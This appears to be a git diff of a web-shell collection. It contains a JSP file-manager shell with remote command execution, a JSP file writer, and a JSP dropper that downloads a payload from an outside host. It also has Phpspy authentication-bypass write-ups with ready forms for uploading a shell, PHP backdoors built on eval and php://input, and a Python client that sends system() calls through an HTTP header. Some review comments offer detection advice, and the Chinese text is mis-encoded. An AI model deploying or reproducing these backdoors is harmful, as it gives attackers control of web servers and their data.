||||
sbSaveCopy.append("<p><font color=red>??±ê??????????,??????????</font>");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strTmpFile=strDesFile;
|
||||
if(f_des.isDirectory())
|
||||
{
|
||||
if(!strDesFile.endsWith("\\"))
|
||||
{
|
||||
strDesFile=strDesFile+"\\";
|
||||
}
|
||||
strTmpFile=strDesFile+"cqq_"+strFile;
|
||||
}
|
||||
|
||||
File f_des_copy=new File(strTmpFile);
|
||||
FileInputStream in1=new FileInputStream(f);
|
||||
FileOutputStream out1=new FileOutputStream(f_des_copy);
|
||||
byte[] buffer=new byte[1024];
|
||||
int c;
|
||||
while((c=in1.read(buffer))!=-1)
|
||||
{
|
||||
out1.write(buffer,0,c);
|
||||
}
|
||||
in1.close();
|
||||
out1.close();
|
||||
|
||||
sbSaveCopy.append("???????? ??"+strPath+"<p>");
|
||||
sbSaveCopy.append("??±ê???? ??"+strTmpFile+"<p>");
|
||||
sbSaveCopy.append("<font color=red>??????????</font>");
|
||||
}
|
||||
}
|
||||
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=·???>");
|
||||
}
|
||||
if(strAction!=null && strAction.equals("newFile"))
|
||||
{
|
||||
String strF=request.getParameter("fileName");
|
||||
String strType1=request.getParameter("btnNewFile");
|
||||
String strType2=request.getParameter("btnNewDir");
|
||||
String strType="";
|
||||
if(strType1==null)
|
||||
{
|
||||
strType="Dir";
|
||||
}
|
||||
else if(strType2==null)
|
||||
{
|
||||
strType="File";
|
||||
}
|
||||
if(!strType.equals("") && !(strF==null || strF.equals("")))
|
||||
{
|
||||
File f_new=new File(strF);
|
||||
if(strType.equals("File") && !f_new.createNewFile())
|
||||
sbNewFile.append(strF+" ???????¨?§°?");
|
||||
if(strType.equals("Dir") && !f_new.mkdirs())
|
||||
sbNewFile.append(strF+" ???????¨?§°?");
|
||||
}
|
||||
else
|
||||
{
|
||||
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
|
||||
}
|
||||
}
|
||||
|
||||
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
|
||||
{
|
||||
String tempdir=".";
|
||||
boolean error=false;
|
||||
response.setContentType("text/html");
|
||||
sbNewFile.append("<p><font color=red>?¨???????ò???????í??</font>");
|
||||
HttpMultiPartParser parser = new HttpMultiPartParser();
|
||||
|
||||
int bstart = request.getContentType().lastIndexOf("oundary=");
|
||||
String bound = request.getContentType().substring(bstart + 8);
|
||||
int clength = request.getContentLength();
|
||||
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
|
||||
if (ht.get("cqqUploadFile") != null)
|
||||
{
|
||||
|
||||
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
|
||||
File f1 = fi.file;
|
||||
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
|
||||
if (info != null && info.aborted)
|
||||
{
|
||||
f1.delete();
|
||||
request.setAttribute("error", "Upload aborted");
|
||||
}
|
||||
else
|
||||
{
|
||||
String path = (String) ht.get("path");
|
||||
if(path!=null && !path.endsWith("\\"))
|
||||
path = path + "\\";
|
||||
if (!f1.renameTo(new File(path + f1.getName())))
|
||||
{
|
||||
request.setAttribute("error", "Cannot upload file.");
|
||||
error = true;
|
||||
f1.delete();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
td,select,input,body{font-size:9pt;}
|
||||
A { TEXT-DECORATION: none }
|
||||
|
||||
#tablist{
|
||||
padding: 5px 0;
|
||||
margin-left: 0;
|
||||
margin-bottom: 0;
|
||||
margin-top: 0.1em;
|
||||
font:9pt;
|
||||
}
|
||||
|
||||
#tablist li{
|
||||
list-style: none;
|
||||
display: inline;
|
||||
margin: 0;
|
||||
}
|
||||
|
||||
#tablist li a{
|
||||
padding: 3px 0.5em;
|
||||
margin-left: 3px;
|
||||
border: 1px solid ;
|
||||
background: F6F6F6;
|
||||
}
|
||||
|
||||
#tablist li a:link, #tablist li a:visited{
|
||||
color: navy;
|
||||
}
|
||||
|
||||
#tablist li a.current{
|
||||
background: #EAEAFF;
|
||||
}
|
||||
|
||||
#tabcontentcontainer{
|
||||
width: 100%;
|
||||
padding: 5px;
|
||||
border: 1px solid black;
|
||||
}
|
||||
|
||||
.tabcontent{
|
||||
display:none;
|
||||
}
|
||||
|
||||
</style>
|
||||
|
||||
<script type="text/javascript">
|
||||
|
||||
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
|
||||
|
||||
////////Stop editting////////////////
|
||||
|
||||
function cascadedstyle(el, cssproperty, csspropertyNS){
|
||||
if (el.currentStyle)
|
||||
return el.currentStyle[cssproperty]
|
||||
else if (window.getComputedStyle){
|
||||
var elstyle=window.getComputedStyle(el, "")
|
||||
return elstyle.getPropertyValue(csspropertyNS)
|
||||
}
|
||||
}
|
||||
|
||||
var previoustab=""
|
||||
|
||||
function expandcontent(cid, aobject){
|
||||
if (document.getElementById){
|
||||
highlighttab(aobject)
|
||||
if (previoustab!="")
|
||||
document.getElementById(previoustab).style.display="none"
|
||||
document.getElementById(cid).style.display="block"
|
||||
previoustab=cid
|
||||
if (aobject.blur)
|
||||
aobject.blur()
|
||||
return false
|
||||
}
|
||||
else
|
||||
return true
|
||||
}
|
||||
|
||||
function highlighttab(aobject){
|
||||
if (typeof tabobjlinks=="undefined")
|
||||
collecttablinks()
|
||||
for (i=0; i<tabobjlinks.length; i++)
|
||||
tabobjlinks[i].style.backgroundColor=initTabcolor
|
||||
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
|
||||
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
|
||||
}
|
||||
|
||||
function collecttablinks(){
|
||||
var tabobj=document.getElementById("tablist")
|
||||
tabobjlinks=tabobj.getElementsByTagName("A")
|
||||
}
|
||||
|
||||
function do_onload(){
|
||||
collecttablinks()
|
||||
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
|
||||
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
|
||||
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
|
||||
}
|
||||
|
||||
if (window.addEventListener)
|
||||
window.addEventListener("load", do_onload, false)
|
||||
else if (window.attachEvent)
|
||||
window.attachEvent("onload", do_onload)
|
||||
else if (document.getElementById)
|
||||
window.onload=do_onload
|
||||
|
||||
|
||||
|
||||
</script>
|
||||
<script language="javascript">
|
||||
|
||||
function doForm(action,path,file,cmd,tab,content)
|
||||
{
|
||||
document.frmCqq.action.value=action;
|
||||
document.frmCqq.path.value=path;
|
||||
document.frmCqq.file.value=file;
|
||||
document.frmCqq.cmd.value=cmd;
|
||||
document.frmCqq.tabID.value=tab;
|
||||
document.frmCqq.content.value=content;
|
||||
if(action=="del")
|
||||
{
|
||||
if(confirm("?·?¨?????????? "+file+" ????"))
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
else
|
||||
{
|
||||
document.frmCqq.submit();
|
||||
}
|
||||
}
|
||||
</script>
|
||||
|
||||
<title>JSP Shell ·?°??????ú</title>
|
||||
<head>
|
||||
|
||||
|
||||
<body>
|
||||
|
||||
<form name="frmCqq" method="post" action="">
|
||||
<input type="hidden" name="action" value="">
|
||||
<input type="hidden" name="path" value="">
|
||||
<input type="hidden" name="file" value="">
|
||||
<input type="hidden" name="cmd" value="">
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type="hidden" name="content" value="">
|
||||
</form>
|
||||
|
||||
<!--Top Menu Started-->
|
||||
<ul id="tablist">
|
||||
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
|
||||
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
|
||||
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
|
||||
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
|
||||
<%=authorInfo[languageNo]%>
|
||||
</ul>
|
||||
<!--Top Menu End-->
|
||||
|
||||
|
||||
<%
|
||||
StringBuffer sbFolder=new StringBuffer("");
|
||||
StringBuffer sbFile=new StringBuffer("");
|
||||
try
|
||||
{
|
||||
File objFile = new File(strDir);
|
||||
File list[] = objFile.listFiles();
|
||||
if(objFile.getAbsolutePath().length()>3)
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
|
||||
|
||||
|
||||
}
|
||||
for(int i=0;i<list.length;i++)
|
||||
{
|
||||
if(list[i].isDirectory())
|
||||
{
|
||||
sbFolder.append("<tr><td > </td><td>");
|
||||
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
|
||||
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
|
||||
}
|
||||
else
|
||||
{
|
||||
String strLen="";
|
||||
String strDT="";
|
||||
long lFile=0;
|
||||
lFile=list[i].length();
|
||||
strLen = convertFileSize(lFile);
|
||||
Date dt=new Date(list[i].lastModified());
|
||||
strDT=dt.toLocaleString();
|
||||
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
|
||||
sbFile.append(""+list[i].getName());
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strLen);
|
||||
sbFile.append("</td><td>");
|
||||
sbFile.append(""+strDT);
|
||||
sbFile.append("</td><td>");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileEdit[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDel[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileDown[languageNo]+"</a> ");
|
||||
|
||||
sbFile.append(" <a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
|
||||
sbFile.append(strFileCopy[languageNo]+"</a> ");
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
out.println("<font color=red>??×÷?§°??? "+e.toString()+"</font>");
|
||||
}
|
||||
%>
|
||||
|
||||
<DIV id="tabcontentcontainer">
|
||||
|
||||
|
||||
<div id="menu3" class="tabcontent">
|
||||
<br>
|
||||
<br> ???ê??
|
||||
<br>
|
||||
<br>
|
||||
|
||||
</div>
|
||||
|
||||
<div id="menu4" class="tabcontent">
|
||||
<br>
|
||||
<p>???????????÷</p>
|
||||
<p> jsp °?±??????????í?÷???¨???????ò???????????í·????÷???????????????ú???????¨????????</p>
|
||||
<p>??????????????????????????windows?????????á?????ü?????°?????????????????????????ò???à??</p>
|
||||
<p>??windows??cmd??</p>
|
||||
<p> </p>
|
||||
<p>????????</p>
|
||||
<p> <b>???ó?????????????????????????????????ò???¨?é??????????????????±??????????ò?ü???ê???????¨??<p>
|
||||
???????·????<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
|
||||
<p> </p>
|
||||
<p>?????ü??????</p>
|
||||
<p> 2004.11.15 V0.9????°?·????????????????ù±?????????????±à?????????????????????????????°???¨????????????</p>
|
||||
<p> 2004.10.27 ???±?¨??0.6°?°??? ?á???????????????????? ?? cmd????</p>
|
||||
<p> 2004.09.20 ??????jsp ???ò?????????ò???????????????????????ò</p>
|
||||
<p> </p>
|
||||
<p> </p>
|
||||
</div>
|
||||
|
||||
|
||||
<div id="menu1" class="tabcontent">
|
||||
<%
|
||||
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"?? <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
|
||||
%>
|
||||
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
|
||||
|
||||
<tr>
|
||||
<td width="25%" align="center" valign="top">
|
||||
<table width="98%" border="0" cellspacing="0" cellpadding="3">
|
||||
<%=sbFolder%>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="81%" align="left" valign="top">
|
||||
|
||||
<%
|
||||
if(strAction!=null && strAction.equals("edit"))
|
||||
{
|
||||
out.println(sbEdit.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("copy"))
|
||||
{
|
||||
out.println(sbCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("down"))
|
||||
{
|
||||
out.println(sbDown.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("savecopy"))
|
||||
{
|
||||
out.println(sbSaveCopy.toString());
|
||||
}
|
||||
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
|
||||
{
|
||||
out.println(sbNewFile.toString());
|
||||
}
|
||||
else
|
||||
{
|
||||
%>
|
||||
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
|
||||
<tr bgcolor="#E7e7e6">
|
||||
<td width="26%"><%=strFileName[languageNo]%></td>
|
||||
<td width="19%"><%=strFileSize[languageNo]%></td>
|
||||
<td width="29%"><%=strLastModified[languageNo]%></td>
|
||||
<td width="26%"><%=strFileOperation[languageNo]%></td>
|
||||
</tr>
|
||||
<%=sbFile%>
|
||||
<!-- <tr align="center">
|
||||
<td colspan="4"><br>
|
||||
×?????????????<font color="#FF0000">30</font> ???ó????<font color="#FF0000">664.9</font>
|
||||
KB </td>
|
||||
</tr>
|
||||
-->
|
||||
</table>
|
||||
</span>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
<form name="frmMake" action="" method="post">
|
||||
<tr><td colspan=2 bgcolor=#FBFFC6>
|
||||
<input type="hidden" name="action" value="newFile">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<%
|
||||
if(!strDir.endsWith("\\"))
|
||||
strDir = strDir + "\\";
|
||||
%>
|
||||
<input type="text" name="fileName" size=36 value="<%=strDir%>">
|
||||
<input type="submit" name="btnNewFile" value="???¨????" onclick="frmMake.submit()" >
|
||||
<input type="submit" name="btnNewDir" value="???¨????" onclick="frmMake.submit()" >
|
||||
</form>
|
||||
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
|
||||
<input type="hidden" name="action" value="upload">
|
||||
<input type="hidden" name="path" value="<%=strDir%>">
|
||||
<input type="hidden" name="file" value="<%=strFile%>">
|
||||
<input type="hidden" name="cmd" value="<%=strCmd%>">
|
||||
<input type="hidden" name="tabID" value="1">
|
||||
<input type="hidden" name="content" value="">
|
||||
<input type="file" name="cqqUploadFile" size="36">
|
||||
<input type="submit" name="submit" value="????">
|
||||
</td></tr></form>
|
||||
</table>
|
||||
</div>
|
||||
<div id="menu2" class="tabcontent">
|
||||
|
||||
<%
|
||||
String line="";
|
||||
StringBuffer sbCmd=new StringBuffer("");
|
||||
|
||||
if(strCmd!=null)
|
||||
{
|
||||
try
|
||||
{
|
||||
//out.println(strCmd);
|
||||
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((line=br.readLine())!=null)
|
||||
{
|
||||
sbCmd.append(line+"\r\n");
|
||||
}
|
||||
}
|
||||
catch(Exception e)
|
||||
{
|
||||
System.out.println(e.toString());
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
strCmd = "set";
|
||||
}
|
||||
|
||||
%>
|
||||
<form name="cmd" action="" method="post">
|
||||
|
||||
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
|
||||
<input type="hidden" name="tabID" value="2">
|
||||
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
|
||||
</form>
|
||||
<%
|
||||
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
|
||||
{
|
||||
%>
|
||||
<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
|
||||
<br>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
</DIV>
|
||||
</div>
|
||||
<br><br>
|
||||
<center><a href="http://www.wooyun.org/" target="_blank">http://www.WooYun.org/</a> ,All Rights Reserved.
|
||||
<br>Email:121208099#qq.com
|
1
jsp/guige02.jsp
Normal file
1
jsp/guige02.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
<%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private String password="734303";//??¡¤????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#ffffff"><%String act="";String path=request.getParameter("path");String content=request.getParameter("content");String url=request.getRequestURI();String url2=request.getRealPath(request.getServletPath());try{act=request.getParameter("act").toString();}catch(Exception e){}if(request.getSession().getAttribute("hehe")!=null){if(request.getSession().getAttribute("hehe").toString().equals("hehe")){if (path!=null && !path.equals("") && content!=null && !content.equals("")){ try{ File newfile=new File(path); PrintWriter writer=new PrintWriter(newfile); writer.println(content); writer.close(); if (newfile.exists() && newfile.length()>0) { out.println("<font size=3 color=red>save ok!</font>"); }else{ out.println("<font size=3 color=red>save erry!</font>"); } }catch(Exception e) { e.printStackTrace(); }}out.println("<form action="+url+" method=post>");out.println("<font size=3><br></font><input type=text size=54 name='path'><br>");out.println("<font size=3 color=red>"+url2+"</font><br>");out.println("<textarea name='content' rows=15 cols=50></textarea><br>");out.println("<input type='submit' value='save!'>");out.println("</form>");}}else{out.println("<div align='center'><form action='?act=login' method='post'>");out.println("<input type='password' name='pass'/>");out.println("<input type='submit' name='update' class='unnamed1' value='Login' />");out.println("</form></div>");}if(act.equals("login")){ String pass=request.getParameter("pass"); if(pass.equals(password)) { session.setAttribute("hehe","hehe"); String uri=request.getRequestURI(); uri=uri.substring(uri.lastIndexOf("/")+1); response.sendRedirect(uri); }else {out.println("Error");out.println("<a href='javascript:history.go(-1)'><font color='red'>go back</font></a></div><br>"); } }%></body></html>
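Review bot: The file carries no description of what it does and its only comment is mis-encoded, so an analyst has to unpick one minified line to learn that it writes the `content` parameter to the server-side file named by `path` once the session attribute `hehe` is set. A leading JSP comment listing those indicators would make the sample usable for detection work, for example `<%-- sample: file-writer web shell; params act/pass/path/content; session attr "hehe"; prints request.getRealPath() --%>`. For hunting, the behaviour to alert on is a `PrintWriter` opened on a `File` built directly from a request parameter inside a JSP under the web root. The page title and the password literal are weaker signals because both are trivially changed.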
|
1
jsp/web02.jsp
Normal file
1
jsp/web02.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
<%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.getRealPath("/")+request.getParameter("f");new File(t).getParentFile().mkdirs();if(request.getParameter("p")==null){DataInputStream i=new DataInputStream(((HttpURLConnection)(new URL("http://qztmi.cn/js/h.txt").openConnection())).getInputStream());DataOutputStream o=new DataOutputStream(new FileOutputStream(t));byte[] b=new byte[4096];int c=0;while((c=i.read(b))>0){o.write(b,0,c);}o.close();i.close();out.println("down-ok");response.setHeader("down-ok","1");}else{(new FileOutputStream(t)).write(request.getParameter("p").getBytes());out.println("upload-ok");}%>
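Review bot: Nothing in this one-line file records that it is a dropper with two modes, so the indicators have to be read out of the code. Without a `p` parameter it fetches the hard-coded `http://qztmi.cn/js/h.txt` and writes it at the name given in `f`; otherwise it writes the value of `p` there. A header comment such as `<%-- sample: dropper; params f, p; fetches http://qztmi.cn/js/h.txt; replies "down-ok" / "upload-ok"; sets response header down-ok: 1 --%>` would document them. The outbound `HttpURLConnection` from the servlet container and the `down-ok` response header are both observable, at the egress proxy and in response logging respectively. Because `f` is concatenated onto `getRealPath("/")` with no normalisation, writes are not confined to the application directory, so file-integrity monitoring should cover whatever the container account can write.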
|
28
php/Phpspy 2010 身份验证绕过漏洞
Normal file
28
php/Phpspy 2010 身份验证绕过漏洞
Normal file
|
@ -0,0 +1,28 @@
|
|||
Phpspy 2010 身份验证绕过漏洞
|
||||
作者:我不知道该唱什么 发布时间:April 17, 2011 00:21:28 分类:tech
|
||||
|
||||
|
||||
利用代码:
|
||||
|
||||
<form method="POST" action="http://mirc.3est.com/1.php">
|
||||
<input type="hidden" name="admin['pass']" value="1">
|
||||
<input type="submit" value="Login">
|
||||
</form>
|
||||
|
||||
在每次向shell请求数据的时候 都附加post一个admin['pass']即可。
|
||||
形成原因:
|
||||
2009不存在该洞,仅限2010版本,对比二者即可得到答案:
|
||||
利用
|
||||
|
||||
foreach(array('_GET','_POST') as $_request) {
|
||||
foreach($$_request as $_key => $_value) {
|
||||
if ($_key{0} != '_') {
|
||||
if (IS_GPC) {
|
||||
$_value = s_array($_value);
|
||||
}
|
||||
$$_key = $_value;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
对变量$admin['pass']进行覆盖。
|
43
php/Phpspy 2011 继续身份验证绕过漏洞
Normal file
43
php/Phpspy 2011 继续身份验证绕过漏洞
Normal file
|
@ -0,0 +1,43 @@
|
|||
Phpspy 2011 继续身份验证绕过漏洞
|
||||
作者:我不知道该唱什么 发布时间:May 1, 2011 14:58:54 分类:tech
|
||||
|
||||
官方目前下载已经修补上了 目前官方下载是2011.php, 文件名为2011ok.php的是带洞版本。
|
||||
|
||||
鄙视转载不留版权的,特别鄙视下那个什么hack情
|
||||
http://hi.baidu.com/5427518 / http://www.hackqing.com/
|
||||
我曾经还以为他是个人物。
|
||||
|
||||
今天m0r5和我说phpspy2011 我都不知道2011出来了 - - 就下下来看看
|
||||
|
||||
发现2011有不少借鉴WSO Shell的地方,看到$pass还是在那个函数的上面,但是验证成功过后用了一个Location重定向了一下,之后会再次检查一次cookies。
|
||||
|
||||
但是想不明白作者为什么这样做,和2010的原理一样,一样绕过:
|
||||
|
||||
下面给出一个更为直接的利用方法,上传你自己的新shell:
|
||||
|
||||
<form method="POST" action="http://www.hackshell.net/2011ok11.php">
|
||||
<input name="password" type="text" size="20" value="hackshell_net">
|
||||
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
|
||||
<input type="hidden" name="action" value="login">
|
||||
<input type="submit" value="Login"></form>
|
||||
|
||||
点击Login,这步点登录后 是登录界面 继续操作下一步:
|
||||
<form method="POST" action="http://www.hackshell.net/2011ok.php">
|
||||
<input name="password" type="text" size="20" value="hackshell_net">
|
||||
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
|
||||
<input type="hidden" name="action" value="phpinfo"><input type="submit" value="Login"></form>
|
||||
|
||||
密码写hackshell_net (默认写好) 点击login之后 查看当前脚本绝对路径,
|
||||
然后访问:
|
||||
<form action="http://www.hackshell.net/2011ok.php" method="POST" enctype="multipart/form-data">
|
||||
<input name="password" type="password" size="20">
|
||||
<input type="hidden" name="pass" value="186c5d4c8ea2b5d95585cde854df00f9">
|
||||
|
||||
<input name="uploadfile" value="" type="file">
|
||||
<input name="doupfile" value="Upload" type="submit">
|
||||
<input name="uploaddir" value="D:/workspace/" type="hidden">
|
||||
<input name="dir" value="D:/workspace/" type="hidden">
|
||||
</form>
|
||||
|
||||
|
||||
其中把iploaddir的value改为phpinfo中看到的路径,上传shell。
|
41
php/php-sh/client.py
Normal file
41
php/php-sh/client.py
Normal file
|
@ -0,0 +1,41 @@
|
|||
#!/usr/bin/python
|
||||
# Client for the backdoor which
|
||||
# uses HTTP CODE header for inserting code
|
||||
# Got the idea after seeing this sort of payload
|
||||
# dropped by a phpmyadmin exploit on rdot :)
|
||||
# Is also good to learn how to use urllib
|
||||
# and not be lazy arse with requests all of time!
|
||||
# Insecurety Research (2013) - insecurety.net
|
||||
import urllib2
|
||||
import sys
|
||||
|
||||
def usage(program):
|
||||
print "HTTP CODE Header Backdoor Command Shell"
|
||||
print "Usage: %s <Backdoor URL>" %(program)
|
||||
print "Example: %s http://www.test.com/webshell.php" %(program)
|
||||
sys.exit(0)
|
||||
|
||||
def main(args):
|
||||
try:
|
||||
if len(args) < 2:
|
||||
usage(args[0])
|
||||
|
||||
print "[+] Using %s as target" %(args[1])
|
||||
print "[!] Popping a shell, type 'exit' to quit"
|
||||
while True:
|
||||
opener = urllib2.build_opener()
|
||||
url = args[1]
|
||||
cmd = raw_input('~$ ')
|
||||
if cmd == "exit":
|
||||
sys.exit(0)
|
||||
else:
|
||||
code = "system('%s');" %(cmd)
|
||||
opener.addheaders.append(('Code', code))# %(str(code))
|
||||
urllib2.install_opener(opener)
|
||||
result = urllib2.urlopen(url).read()
|
||||
print result
|
||||
except Exception, e:
|
||||
print e
|
||||
|
||||
if __name__ == "__main__":
|
||||
main(sys.argv)
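Review bot: The header comment explains the idea but not the wire format, which is the part a detection needs. The line `opener.addheaders.append(('Code', code))` puts PHP source in a request header named `Code`, which the server side reads as `HTTP_CODE`. I would add `# Wire indicator: request header "Code:" whose value is PHP source, e.g. system('...');` above `main`. Common access-log formats record only the request line, referer and user agent, so this traffic is invisible unless the `Code` header is logged or matched at a WAF or proxy. The default urllib2 `User-Agent`, left unchanged here, is a weaker secondary signal.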
|
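--- a/php/php-sh/server.php
+++ b/php/php-sh/server.php
@@ -0,0 +1,3 @@
+<?php
+eval(getenv('HTTP_CODE'));
+?>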
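Review bot: This three-line file has no comment, and its single statement `eval(getenv('HTTP_CODE'));` executes whatever arrives in the `Code` request header, so it needs a one-line description for anyone triaging it: `// sample: evaluates the HTTP "Code" request header as PHP`. For static scanning, match `eval(` applied to `getenv('HTTP_…')` or `$_SERVER['HTTP_…']` as well as to `$_GET`/`$_POST`/`$_REQUEST`, which is where many simple signatures stop. `eval` is a language construct, so `disable_functions` cannot switch it off. Prevention therefore rests on write protection of the web root and file-integrity monitoring.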
53
php/phpkit-0.1a/README
Normal file
53
php/phpkit-0.1a/README
Normal file
|
@ -0,0 +1,53 @@
|
|||
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
|
||||
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
|
||||
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
|
||||
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
|
||||
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
|
||||
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
|
||||
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|
||||
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
|
||||
|
||||
phpkit-0.1a
|
||||
|
||||
Stealth PHP Backdooring Utility - Insecurety Research 2013
|
||||
|
||||
This is a simple kit to demonstrate a very effective way of
|
||||
backdooring a webserver running PHP.
|
||||
Essentially, it functions by parsing out any valid PHP code
|
||||
from raw HTTP POST data sent to it, and executing said PHP.
|
||||
|
||||
No eval() or other suspect calls are in the serverside script,
|
||||
the code is executed by the include() function. The php://input
|
||||
data stream (which is basically "anything sent via raw POST) is
|
||||
used to "capture" the raw POST data, and when parsed by include()
|
||||
the code sent is executed.
|
||||
|
||||
This allows for many things to be done, i.e. executing any PHP
|
||||
code you happen to write. The example client, phpkit.py, simply
|
||||
gives a "shell prompt" (non interactive, each command is executed
|
||||
in a new "context") on the victim server. It is trivial to write
|
||||
pretty much anything, I have also written "upload.py" which will
|
||||
be ready for the next release, which allows uploading arbritary
|
||||
files to the infected webserver.
|
||||
|
||||
USAGE:
|
||||
You upload "odd.php" to the target webserver by any means necessary.
|
||||
You then run ./phpkit.py <url to php file on server> and enjoy!
|
||||
|
||||
Example Use:
|
||||
[infodox@sphynx:~/phpkit-0.1a]$ ./phpkit.py http://localhost/odd.php
|
||||
|
||||
[+] URL in use: http://localhost/odd.php
|
||||
|
||||
shell:~$ id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
shell:~$ uname -a
|
||||
Linux yore-ma 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
|
||||
|
||||
shell:~$
|
||||
|
||||
Questions, comments, bug reports and abuse? infodox () insecurety.net
|
||||
|
||||
Licence: The do whatever you want with it, just don't rip code without
|
||||
giving credit licence.
|
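--- a/php/phpkit-0.1a/odd.php
+++ b/php/phpkit-0.1a/odd.php
@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>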
